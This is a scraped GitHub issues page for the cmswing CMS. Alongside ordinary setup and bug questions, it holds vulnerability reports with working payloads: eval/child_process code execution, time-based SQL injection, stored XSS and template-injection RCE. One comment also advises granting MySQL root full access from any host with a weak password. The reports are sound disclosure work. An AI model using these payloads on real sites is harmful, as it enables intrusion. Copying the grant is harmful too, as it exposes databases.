arterli / cmswing Goto Github PK
View Code? Open in Web Editor NEW一款基于Egg.js(为企业级框架和应用而生)、Sequelize和GraphQL,功能强大的(PC端,手机端和微信公众平台)电子商务平台及CMS建站系统
Home Page: http://www.cmswing.com
License: Other
一款基于Egg.js(为企业级框架和应用而生)、Sequelize和GraphQL,功能强大的(PC端,手机端和微信公众平台)电子商务平台及CMS建站系统
Home Page: http://www.cmswing.com
License: Other
It seems there is no issue with npm start
. But I am unable forward to http://127.0.0.1:8360
.
[2018-03-23T05:14:51.131] [11064] [INFO] - Server running at http://127.0.0.1:8360
[2018-03-23T05:14:51.134] [11064] [INFO] - ThinkJS version: 3.2.7
[2018-03-23T05:14:51.134] [11064] [INFO] - Enviroment: development
[2018-03-23T05:14:51.134] [11064] [INFO] - Workers: 4
[2018-03-23T05:14:53.017] [3464] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.061] [3464] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 43ms
[2018-03-23T05:14:53.064] [2788] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.065] [3464] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 2ms
[2018-03-23T05:14:53.104] [2788] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 39ms
[2018-03-23T05:14:53.107] [2788] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 1ms
[2018-03-23T05:14:53.221] [15348] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.259] [15348] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 37ms
[2018-03-23T05:14:53.262] [15348] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 2ms
[2018-03-23T05:14:53.269] [6712] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.304] [6712] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 35ms
[2018-03-23T05:14:53.307] [6712] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 1ms
[2018-03-23T05:14:55.779] [17696] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:55.816] [17696] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 36ms
[2018-03-23T05:14:55.819] [17696] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 2ms
[2018-03-23T05:15:00.014] [2788] [INFO] - SQL: SELECT `id` FROM `cmswing_order` WHERE ( `pay_status` = 0 ) AND ( `status` = 2 ) AND ( `create_time` < 1521666900011 ) AND ( `type` = 0 ), Time: 2ms
[2018-03-23T05:15:00.017] [2788] [INFO] - CLI admin/crontab/cloa 200 8ms
global.encryptPassword = function(password, md5encoded) {
md5encoded = md5encoded || false;
password = md5encoded ? password : think.md5(password);
return think.md5(think.md5('www.cmswing.com') + password + think.md5('Arterli'));
};
Find a code execution vulnerability in cmswing project version 1.3.8,Details can be found in the analysis below.
The vulnerability lies in the log
function in the cmswing/src/mode/action.js
async log(action, model, record_id, user_id, ip, url) {
// action=action||null,model=model||null,record_id=record_id||null,user_id=user_id||null;
// 参数检查
if (think.isEmpty(action) || think.isEmpty(model) || think.isEmpty(record_id)) {
return '参数不能为空';
}
if (think.isEmpty(user_id)) {
const user = await think.session('userInfo');
const id = user.id;
user_id = id;
}
// 查询行为,判断是否执行
const action_info = await this.where({name: action}).find();
if (action_info.status != 1) {
return '该行为被禁用';
}
// 插入行为日志
const data = {
action_id: action_info.id,
user_id: user_id,
action_ip: _ip2int(ip),
model: model,
record_id: record_id,
create_time: new Date().valueOf()
};
data.remark = '';
// 解析日志规则,生成日志备注;
if (!think.isEmpty(action_info.log)) {
const match = action_info.log.match(/\[(\S+?)\]/g);
if (!think.isEmpty(match)) {
const log = {
user: user_id,
record: record_id,
model: model,
time: new Date().valueOf(),
data: {
user: user_id,
record: record_id,
model: model,
time: new Date().valueOf()
}
};
const replace = [];
for (let val of match) {
val = val.replace(/(^\[)|(\]$)/g, '');
const param = val.split('|');
console.log(1111111,param);
if (!think.isEmpty(param[1])) {
if (param[0] == 'user') {
replace.push(await call_user_func(param[1], log[param[0]]));
} else {
replace.push(call_user_func(param[1], log[param[0]]));
}
} else {
replace.push(log[param[0]]);
}
}
data.remark = str_replace(match, replace, action_info.log);
// console.log(data.remark)
} else {
data.remark = action_info.log;
}
} else {
// 未定义日志规则,记录操作URL
data.remark = '操作url:' + url;
}
if (!think.isNumber(record_id)) {
data.record_id = 0;
}
await this.model('action_log').add(data);
if (!think.isEmpty(action_info.rule)) {
const rules = await this.parse_action(action, user_id);
// console.log(rules);
const res = await this.execute_action(rules, action_info.id, user_id);
}
}
......
global.call_user_func = function(cb, params) {
const func = eval(cb);
if (!think.isArray(params)) {
params = [params];
}
return func.apply(cb, params);
};
The variable log
is the user behavior log data transmitted by the front end. The function log implements the processing of the variable log. If the param[0]=='user'
, the call_user_func
function is called. The variable is not checked. Malicious parameters will lead to the eval
method of the call_user_fun function to implement code execution.
Local Test
Enter the background of the system, select user behavior,add our payload to the rules of conduct
Add an article to trigger the user behavior just now.
Execution Log, the code was successfully executed and the IP-related information was printed out
The first XSS vulnerablity
Question and answer module. In the Question supplement function, when inserting a link, fill in "> < SVG / onload = alert ('xss') > <! -- in the address item to form a stored XSS.This vulnerability can be triggered when any visitor views the issue
The second XSS vulnerablity
Stored XSS exists in the title item of online submission module, and the payload is as follows <script>alert (1)</script>
The specific location of the vulnerability is shown in the figure below,After the submission is approved by the admin user, the vulnerability will be triggered when the administrator opens the content management page.
thinkjs -V 显示的为2.2.8
运行后连接不了数据库报错。
Find a code execution vulnerability in cmswing project version 1.3.8,Details can be found in the analysis below.
Vulnerability Location
The vulnerability lies in the rechargeAction
function in the cmswing/src/controller/admin/user.js
async rechargeAction() {
if (this.isAjax('POST')) {
const data = this.post();
const self = this;
const insertId = await this.db.transaction(async() => {
await self.db.where({id: data.id}).increment('amount', data.balance);
const amount_log = await self.db.where({id: data.id}).getField('amount', true);
return await self.model('balance_log').db(self.db.db()).add({
admin_id: self.user.uid,
user_id: data.id,
type: 2,
time: new Date().valueOf(),
amount: data.balance,
amount_log: amount_log,
note: `管理员(${await get_nickname(self.user.uid)})为您充值,充值的金额为:${data.balance} 元`
});
});
if (insertId) {
return this.success({name: '充值成功!'});
} else {
return this.fail('充值失败!');
}
} else {
const id = this.get('ids');
const name = await get_nickname(id);
this.assign('name', name);
this.assign('id', id);
this.meta_title = '会员充值';
return this.display();
}
}
The variable data.balance
represents the amount of recharge. The function rechargeAction increases the amount of money by the specified user, but lacks sufficient checks for data.balance
, which results in SQL injection when database update operation is performed.
Local Test
Enter the background of the system, select user recharge
Modify the balance
to (select if(left(version(),1)=5,sleep(5),sleep(10)))
. it was found that the replenishment was successful and the response time was extended by 5 seconds, proving that our statement was successfully injected into the database for execution.
table:member|field:score|condition:id=${self} AND (select if(substr(version(),1)>0,sleep(5),1))|rule:1
设置推荐位,前台页面无效。后台推荐位设置成列表推荐,模板写了 position='1',实际前台展示没有变化。返回编辑,刚才设置推荐位的信息没有选中
初步分析是开发环境下代码修改会重启系统,新增模型会把model目录下的文件删除,导致服务重启,从而导致报错。
[user|console.log(require('child_process').execSync('ipconfig').toString('utf-8'))]
or [user|console.log(require('child_process').execSync('calc').toString('utf-8'))]
模板注入 src/controller/admin/template.js
/**
网站首页模版编辑
@returns {*}
*/
async homeAction() {
const gid = await this.model('temp_group').where({isdefault: 1}).getField('gid', true);
const map = {
module: 'home',
controller: 'index',
action: 'index',
type: this.para('type') || 1,
gid: gid
};
const temp = await this.model('temp').where(map).find();
let temppath;
if (temp.type == 2) {
temppath = ${think.ROOT_PATH}/view/${temp.module}/mobile/
;
} else {
temppath = ${think.ROOT_PATH}/view/${temp.module}/
;
}
const templateFile = ${temppath}${temp.controller}${this.config('view.nunjucks.sep')}${temp.action}${this.config('view.nunjucks.extname')}
;
if (this.isPost) {
const data = this.post();
data.id = temp.id;
data.module = map.module;
data.controller = map.container;
data.action = map.action;
data.name = temp.name;
data.type = temp.type;
data.gid = temp.gid;
console.log(data);
// await this.model("temp").add(data);
temp.pid = temp.id;
delete temp.id;
temp.baktime = new Date().getTime();
temp.lastuser = this.user.uid;
console.log(temp);
// return false;
// 修改前先备份
if (data.html != temp.html) {
const bak = await this.model('temp_bak').add(temp);
const res = await this.model('temp').update(data);
if (!think.isEmpty(res)) {
fs.writeFileSync(templateFile, data.html);
return this.success({name: '添加成功!'});
}
} else {
return this.fail('请先修改模板!');
}
} else {
// 首页网站编辑
// console.log(this.adminmenu["10"]);
this.meta_title = '首页模板';
if (think.isFile(templateFile)) {
const tempcon = fs.readFileSync(templateFile, 'utf8');
temp.html = tempcon;
}
// console.log(temp);
this.assign('temp', temp);
return this.display();
}
}
可以看到通过nunjucks模板对前端进行渲染,对传入的post请求的html参数只有判空校验,所以可以通过模板注入命令执行来进行RCE,直接构造调用child_process的命令执行,我们这里进行弹计算器演示
然后访问首页进行渲染
成功弹出计算器,其他模板也存在该问题
我想做个社区内居民互相买卖二手货的小站点,javascript算刚入门,请问一下,如果要给您的模板加上用户可以发布商品信息的功能,难度有多大?谢谢!
如何支持https?
更新一条记录的某个字段和自增某个字段可以在一条语句完成
例如
common/model/member.js的autoLogin中
let data = {
'last_login_time': new Date().valueOf(),
'last_login_ip': _ip2int(ip),
};
let use = await this.where({id: user.id}).update(data);
await this.where({id: user.id}).increment('login');
可改为
let field = 'login';
let data = {
last_login_time: new Date().valueOf(),
last_login_ip:_ip2int(ip),
[field]: ['exp', `\`${field}\`+1`],
};
await this.where({ id: user.id }).update(data);
test1
RT, 都一年没更新了
准备用vue.js写前台页面,请问有rest的api接口地址可以供调用吗?
2023-03-16 16:55:34,849 INFO 17284 egg-sequelize Executed (default): SHOW INDEX FROM sys_models_associate
FROM meng_da
2023-03-16 16:55:34,863 INFO 12492 [egg-sequelize] Not overriding built-in method from model attribute: where
2023-03-16 16:55:34,866 INFO 12492 [egg-sequelize] Not overriding built-in method from model attribute: where
2023-03-16 16:55:34,867 INFO 12492 [egg-sequelize] Not overriding built-in method from model attribute: where
2023-03-16 16:55:34,869 ERROR 12492 nodejs.TypeError: Cannot read properties of undefined (reading 'hasMany')
at Function.SysUser.associate (F:\workspace\mine\mengda-official-site\app\model\sys_user.js:22:31)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:118:54
at Array.forEach ()
at loadDatabase (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:117:12)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:35:22
at Array.forEach ()
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:34:24)
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\app.js:4:26)
at Hook.configDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:99:9)
at Lifecycle.triggerConfigDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:154:14)
pid: 12492
hostname: DESKTOP-559IHRU
F:\workspace\mine\mengda-official-site\node_modules\egg-cluster\lib\app_worker.js:32
throw err;
^
TypeError: Cannot read properties of undefined (reading 'hasMany')
at Function.SysUser.associate (F:\workspace\mine\mengda-official-site\app\model\sys_user.js:22:31)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:118:54
at Array.forEach ()
at loadDatabase (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:117:12)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:35:22
at Array.forEach ()
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:34:24)
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\app.js:4:26)
at Hook.configDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:99:9)
at Lifecycle.triggerConfigDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:154:14)
[2023-03-16 16:55:34.877] [cfork:master:15552] worker:12492 disconnect (exitedAfterDisconnect: false, state: disconnected, isDead: false, worker.disableRefork: true)
[2023-03-16 16:55:34.877] [cfork:master:15552] don't fork, because worker:12492 will be kill soon
2023-03-16 16:55:34,878 INFO 15552 [master] app_worker#3:12492 disconnect, suicide: false, state: disconnected, current workers: ["2","3"]
2023-03-16 16:55:34,881 INFO 17284 egg-sequelize Executed (default): SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_NAME = 'sys_models_fields' AND TABLE_SCHEMA = 'meng_da'
[2023-03-16 16:55:34.895] [cfork:master:15552] worker:12492 exit (code: 1, exitedAfterDisconnect: false, state: dead, isDead: true, isExpected: false, worker.disableRefork: true)
[2023-03-16 16:55:34.896] [cfork:master:15552] worker:17284 disconnect (exitedAfterDisconnect: true, state: disconnected, isDead: false, worker.disableRefork: false)
[2023-03-16 16:55:34.897] [cfork:master:15552] don't fork new work (refork: false)
2023-03-16 16:55:34,897 INFO 15552 [master] app_worker#2:17284 disconnect, suicide: true, state: disconnected, current workers: ["4"]
9233 closed
2023-03-16 16:55:34,906 WARN 6356 [ClusterClient:Connection] socket is closed by other side while there were still unhandled data in the socket buffer
Debugger listening on ws://127.0.0.1:9233/a1e69dcb-56d5-448f-adb6-d44326a89222
For help, see: https://nodejs.org/en/docs/inspector
[2023-03-16 16:55:34.927] [cfork:master:15552] worker:17284 exit (code: null, exitedAfterDisconnect: true, state: dead, isDead: true, isExpected: true, worker.disableRefork: false)
2023-03-16 16:55:35,816 INFO 9832 [RemoteConfig] loading remote config from F:\workspace\mine\mengda-official-site\run\remote_config.json
9233 opened
步骤:
1 按照文档配置完善,正常ip+8360可以访问 例如 http://127.0.0.1:8360
2:按照这里的https://www.cmswing.com/p/404.html
使用nginx配置,另存为shop.conf软连接
include shop.conf;
nginx -t 测试没有问题,重启
3:访问域名http://xxx.com/index.js 提示404
我的shop.conf
server {
listen 80;
server_name www.mygame.com;
root /home/wwwroot/default;
set $node_port 8360;
index index.js index.html index.htm;
if ( -f $request_filename/index.html ){
rewrite (.*) $1/index.html break;
}
if ( !-f $request_filename ){
rewrite (.*) /index.js;
}
location = /index.js {
proxy_http_version 1.1;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_set_header X-NginX-Proxy true;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_pass http://127.0.0.1:$node_port$request_uri;
proxy_redirect off;
}
location ~ /static/ {
etag on;
expires max;
}
}
/home/ubuntu/CmsWing-1.1.0/src/config/adapter/view.js:213
env.addFilter("getmodelfield", async(id, model_id, field, callback) => {
^
SyntaxError: Unexpected token (
at createScript (vm.js:56:10)
at Object.runInThisContext (vm.js:97:10)
at Module._compile (module.js:542:28)
at Object.Module._extensions..js (module.js:579:10)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
at Function.Module._load (module.js:438:3)
at Module.require (module.js:497:17)
at require (internal/module.js:20:19)
at Object. (/home/ubuntu/CmsWing-1.1.0/src/config/adapter.js:51:16)
at Module._compile (module.js:570:32)
at Object.Module._extensions..js (module.js:579:10)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
at Function.Module._load (module.js:438:3)
at Module.require (module.js:497:17)
Window10系统
node 14.9.3
$ npm run dev
[email protected] dev D:\playtime\CmsWing
egg-bin dev
[egg-ts-helper] create typings\app\extend\context.d.ts (3ms)
[egg-ts-helper] create typings\app\extend\helper.d.ts (5ms)
[egg-ts-helper] create typings\app\controller\index.d.ts (4ms)
[egg-ts-helper] create typings\app\middleware\index.d.ts (3ms)
[egg-ts-helper] create typings\app\model\index.d.ts (5ms)
[egg-ts-helper] create typings\config\index.d.ts (26ms)
[egg-ts-helper] create typings\config\plugin.d.ts (1ms)
[egg-ts-helper] create typings\app\service\index.d.ts (2ms)
[egg-ts-helper] create typings\app\index.d.ts (1ms)
2022-11-08 00:04:33,981 INFO 8392 [master] node version v14.19.3
2022-11-08 00:04:33,982 INFO 8392 [master] egg version 3.3.3
2022-11-08 00:04:35,242 INFO 14168 [egg-sequelize] Not overriding built-in method from model attribute: where
2022-11-08 00:04:35,271 INFO 14168 [egg-sequelize] Not overriding built-in method from model attribute: where
2022-11-08 00:04:35,274 INFO 14168 [egg-sequelize] Not overriding built-in method from model attribute: where
2022-11-08 00:04:35,393 ERROR 14168 nodejs.Error: Body must be a string. Received: undefined.
at devAssert (D:\playtime\CmsWing\node_modules\graphql\jsutils\devAssert.js:12:11)
at new Source (D:\playtime\CmsWing\node_modules\graphql\language\source.js:32:32)
at new Parser (D:\playtime\CmsWing\node_modules\graphql\language\parser.js:98:9)
at Object.parse (D:\playtime\CmsWing\node_modules\graphql\language\parser.js:31:18)
at Object. (D:\playtime\CmsWing\node_modules\graphql-tools\dist\stitching\introspectSchema.js:40:42)
at Module._compile (internal/modules/cjs/loader.js:1085:14)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
at Module.load (internal/modules/cjs/loader.js:950:32)
at Function.Module._load (internal/modules/cjs/loader.js:790:12)
at Module.require (internal/modules/cjs/loader.js:974:19)
[Intervention] Unable to preventDefault inside passive event listener due to target being treated as passive. See <URL>
addEvent("mousewheel", wheel);
改为 addEvent("mousewheel", wheel, {passive: false});
貌似可以解决勉强在cloud9上运行起来了,但是对于这个系统确实不熟悉,node.js知识为零,求增加框架相关文档。 @arterli
需要给权限给sql
grant all privileges on . to 'root'@'192.168.0.103' identified by '123456';
如果你是本地登录的,那么:
grant all privileges on . to 'root'@'localhost' identified by '123456';
当然你也可以直接改成这样:
grant all privileges on . to 'root'@'%' identified by '123456';
就可以给所有ip都设定root登陆了。
如果授权成功,会有Query OK的提示。
然后:
flush privileges;
这个是刷新授权的意思,如果没有这句话,授权可能无法立刻生效。
exit;
这个是退出的意思。
参考https://blog.csdn.net/qq_36735409/article/details/78032144
设置微信自动回复,当内容为文字时,设置换行不生效,直接打印出<br>,\n也不能用
如视频封面我想要备注提示上传图片宽高
如图片、文章封面就可以随意宽高上传
SyntaxError: Invalid or unexpected token
at new Script (vm.js:79:7)
at createScript (vm.js:251:10)
at Object.runInThisContext (vm.js:303:10)
at Module._compile (internal/modules/cjs/loader.js:657:28)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:700:10)
at Module.load (internal/modules/cjs/loader.js:599:32)
at tryModuleLoad (internal/modules/cjs/loader.js:538:12)
at Function.Module._load (internal/modules/cjs/loader.js:530:3)
at Module.require (internal/modules/cjs/loader.js:637:17)
at require (internal/modules/cjs/helpers.js:22:18)
如题,通过删除商品,购物车会报错
模板注入 src/controller/admin/template.js
/**
网站首页模版编辑
@returns {*}
*/
async homeAction() {
const gid = await this.model('temp_group').where({isdefault: 1}).getField('gid', true);
const map = {
module: 'home',
controller: 'index',
action: 'index',
type: this.para('type') || 1,
gid: gid
};
const temp = await this.model('temp').where(map).find();
let temppath;
if (temp.type == 2) {
temppath = ${think.ROOT_PATH}/view/${temp.module}/mobile/
;
} else {
temppath = ${think.ROOT_PATH}/view/${temp.module}/
;
}
const templateFile = ${temppath}${temp.controller}${this.config('view.nunjucks.sep')}${temp.action}${this.config('view.nunjucks.extname')}
;
if (this.isPost) {
const data = this.post();
data.id = temp.id;
data.module = map.module;
data.controller = map.container;
data.action = map.action;
data.name = temp.name;
data.type = temp.type;
data.gid = temp.gid;
console.log(data);
// await this.model("temp").add(data);
temp.pid = temp.id;
delete temp.id;
temp.baktime = new Date().getTime();
temp.lastuser = this.user.uid;
console.log(temp);
// return false;
// 修改前先备份
if (data.html != temp.html) {
const bak = await this.model('temp_bak').add(temp);
const res = await this.model('temp').update(data);
if (!think.isEmpty(res)) {
fs.writeFileSync(templateFile, data.html);
return this.success({name: '添加成功!'});
}
} else {
return this.fail('请先修改模板!');
}
} else {
// 首页网站编辑
// console.log(this.adminmenu["10"]);
this.meta_title = '首页模板';
if (think.isFile(templateFile)) {
const tempcon = fs.readFileSync(templateFile, 'utf8');
temp.html = tempcon;
}
// console.log(temp);
this.assign('temp', temp);
return this.display();
}
}
可以看到通过nunjucks模板对前端进行渲染,对传入的post请求的html参数只有判空校验,所以可以通过模板注入命令执行来进行RCE,直接构造调用child_process的命令执行,我们这里进行弹计算器演示
然后访问首页进行渲染
成功弹出计算器,其他的模板也存在该注入问题
用 admin 账号登陆删掉后,不能再用QQ号登陆。估计时数据库没有删除 QQ 相关信息,导致数据不一致。
test
package.json里面写着MIT,不过可以再根目录放置一个LICENSE么
Find a code execution vulnerability in cmswing project version 1.3.8,Details can be found in the analysis below.
Vulnerability Location
The vulnerability lies in the updateAction
function in the cmswing/src/controller/admin/action.js
async updateAction() {
const data = this.post();
if (think.isEmpty(data.id)) {
data.status = 1;
data.update_time = Date.now();
const res = await this.model('action').add(data);
if (res) {
this.success({name: '新增成功!', url: '/admin/action/index'});
} else {
this.fail('添加失败!');
}
} else {
data.update_time = Date.now();
const res = await this.model('action').update(data);
if (res) {
this.success({name: '更新成功!', url: '/admin/action/index'});
} else {
this.fail('更新失败!');
}
}
}
The variable data
is the user behavior data transmitted by the front end. The function updateAction
updates the user behavior using data. Due to the lack of data checking, SQL injection exists. When the user triggers the corresponding behavior, for example, adding articles, SQL statement execution will be triggered.
Local Test
Enter the background of the system, select user behavior,add our payload to the rules of conduct
Add an article to trigger the user behavior just now. The SQL statement is executed successfully and the response time exceeds 5 seconds.
Database Execution Log
在后台管理中,模型管理->新增模型->addAction() 这个动作 应该少一个创建数据库table的逻辑, 请您确认一下
我在尝试微信扫一扫登录时,会跳转到https://localhost/connect/qrconnect?...
而不是https://open.qq.com/connect/qrconnect?...
访问地址http://127.0.0.1:8360/admin时出现404错误!
NotFoundError: url /admin
not found.
[2017-08-11 10:15:55] [HTTP] GET /admin/public/signin 200 269ms
{ success: 1,
challenge: '1560f1dd2e523f6f9263fa24a502a5d2',
gt: '4dad8be53801fa4e2e50c1be078e2187' }
[2017-08-11 10:15:55] [HTTP] GET /admin/public/geetest?t=1502417755542 200 409ms
[2017-08-11 10:18:04] [HTTP] POST /admin/public/signin 200 120033ms
This CMS is awesome, and is there lang translate file
富文本中上传图片后为
<img data-mce-src="public/xxx/xxx.jpg">
这个相对路径在127.0.0.1:7001/admin下可以工作
但是在前台页面如 http://127.0.0.1:7001/cms/detail/1
中是错误的
目前暂时将app/controller/cms/doc.js:getContent:266
中的type为input-rich-text的obj.options中增加了tinymce的配置项切换到绝对路径修复
obj.type = 'input-rich-text';
obj.receiver = {
method: 'post',
url: '/upload/adminToken',
headers: {
resBody: '{"link":"{{url}}"}',
},
};
obj.options = {
height: 600,
relative_urls: false,
remove_script_host: false,
convert_urls: true,
document_base_url: '/',
codesample_languages: [
{ text: 'HTML', value: 'html' },
{ text: 'JavaScript', value: 'javascript' },
{ text: 'CSS', value: 'css' },
{ text: 'json', value: 'json' },
{ text: 'graphql', value: 'graphql' },
{ text: 'bash', value: 'bash' },
{ text: 'git', value: 'git' },
{ text: 'markdown', value: 'markdown' },
{ text: 'sql', value: 'sql' },
{ text: 'typescript', value: 'typescript' },
],
content_css: '/public/sys/prism.css',
};
注册的时候我使用了 [email protected]的长度字符串报错
也没有提示 后来看了后台logs
m','18819448261',1565861057993,0,1), Time: 5ms
{ Error: ER_DATA_TOO_LONG: Data too long for column 'username' at row 1
at Query.Sequence._packetToError (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/sequences/Sequence.js:47:14)
at Query.ErrorPacket (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/sequences/Query.js:77:18)
at Protocol._parsePacket (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Protocol.js:291:23)
at Parser._parsePacket (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Parser.js:433:10)
at Parser.write (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Parser.js:43:10)
at Protocol.write (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Protocol.js:38:16)
at Socket.<anonymous> (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/Connection.js:91:28)
at Socket.<anonymous> (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/Connection.js:525:10)
at Socket.emit (events.js:189:13)
at addChunk (_stream_readable.js:284:12)
at readableAddChunk (_stream_readable.js:265:11)
at Socket.Readable.push (_stream_readable.js:220:10)
at TCP.onStreamRead [as onread] (internal/stream_base_commons.js:94:17)
--------------------
at Protocol._enqueue (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Protocol.js:144:48)
at PoolConnection.query (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/Connection.js:201:25)
at Promise (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-helper/index.js:83:10)
at new Promise (<anonymous>)
at args (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-helper/index.js:82:12)
at ThinkMysql.[think-mysql-query] (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-mysql/index.js:169:12)
at getConnection.then.connection (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-mysql/index.js:247:25)
at process._tickCallback (internal/process/next_tick.js:68:7)
code: 'ER_DATA_TOO_LONG',
例如,域名是www.xyz.com, 希望配置www.xyz.com/cms/到cmswing. 是否可以再cmswing中添加一个prefix="cms", 这样可以方便的配置nginx
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.